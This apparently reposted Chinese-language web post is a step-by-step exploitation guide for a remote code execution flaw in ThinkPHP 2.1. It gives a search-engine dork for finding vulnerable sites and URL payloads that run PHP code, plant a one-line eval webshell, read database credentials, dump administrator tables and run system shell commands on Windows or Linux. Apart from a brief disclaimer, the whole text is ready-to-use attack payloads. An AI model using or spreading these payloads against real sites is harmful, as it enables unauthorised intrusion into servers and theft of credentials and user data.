Thinkphp2.1漏洞利用


thinkphp2.1版本

Google語法:

inurl:index.php intext:ThinkPHP 2.1 { Fast & Simple OOP PHP Framework }  禁止用在非法用途

進行測試,輸出phpinfo

index.php/Index/index/name/$%7B@phpinfo%28%29%7D

輸出版本信息:

index.php/module/action/param1/${@print(THINK_VERSION)}

寫入一句話

index.php/module/action/param1/${@print(eval($_POST[c]))}

 

 

 一些其他執行語句:

1.使用c方法,獲取其他數據庫 配置相關信息:c(db_name)、c(db_host)、c(db_user)、c(db_pwd)等 

/index.php/module/action/param1/$%7b@print(c(db_name))%7d

3.使用d方法或者m方法,查詢其他數據庫 ,最典型的使用方式var_dump(d(admin)->select()),能夠查詢出管理員信息,當然,表名需要猜一下,一般是admin,user等

/index.php/module/action/param1/$%7b@print(var_dump(d(admin)->select()))%7d

4.利用php在“·”(tab鍵上面的鍵,url編碼后為%60)之間的內容可以當做命令執行的方式,不管是windows還是linux下,都可以執行cmd或者是shell命令。

index.php/module/action/param1/$%7b@print(%60dirls%60)%7d  ---------- 在windows下

index.php/module/action/param1/$%7b@print(%60ls%60)%7d -------------在linux下


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM